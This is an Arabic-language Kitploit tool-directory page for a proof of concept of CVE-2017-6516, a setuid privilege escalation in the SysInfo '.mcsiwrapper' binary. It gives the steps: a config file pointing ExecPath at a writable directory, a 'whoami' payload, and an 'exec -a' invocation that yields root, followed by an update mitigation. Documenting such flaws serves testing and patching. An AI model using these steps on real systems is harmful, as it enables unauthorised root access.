Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-6516-mcsiwrapper- — PoC / منهجية لاستغلال CVE-2017-6516 | Kitploit
أدوات/GitHubGitHub/rubytox/cve-2017-6516-mcsiwrapper-
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقاستغلال الملفات الثنائية
GitHubrubytox/cve-2017-6516-mcsiwrapper-

CVE-2017-6516-mcsiwrapper-

PoC / منهجية لاستغلال CVE-2017-6516

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-6516

CVE-2017-6516 هي ثغرة تصعيد صلاحيات تستهدف الثنائي .mcsiwrapper من MagniCorp SysInfo تحت الإصدار 10-H64. عندما يكون لهذا الثنائي بت SUID مضبوطًا ويكون قديمًا، يمكن للمستخدم تنفيذ كود عشوائي بصفت مالك الثنائي - والذي غالبًا ما يكون root.

المتطلبات

  • يجب أن يكون الثنائي .mcsiwrapper مثبتًا كـ setuid:
root@kitploit:~
$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
  • يجب أن يكون الثنائي .mcsiwrapper تحت الإصدار 10-H64:
root@kitploit:~
$ .mcsiwrapper --version
<إصدار أقل من 10-H64>

الاستغلال

أنشئ ملفًا باسم config بالمحتوى التالي:

root@kitploit:~
ExecPath=<مسار لدليل قابل للكتابة>

أنشئ ملفًا قابلًا للتنفيذ كحمولة في دليل ExecPath، على سبيل المثال:

root@kitploit:~
#!/bin/sh
whoami

واجعله قابلًا للتنفيذ:

root@kitploit:~
$ chmod +x payload

شغّل الأمر:

root@kitploit:~
$ bash -c "exec -a payload .mcsiwrapper --configfile <مسار ملف الإعدادات>"
root

التخفيف

قم بتحديث .mcsiwrapper إلى على الأقل 10-H64.

تنزيل الأداة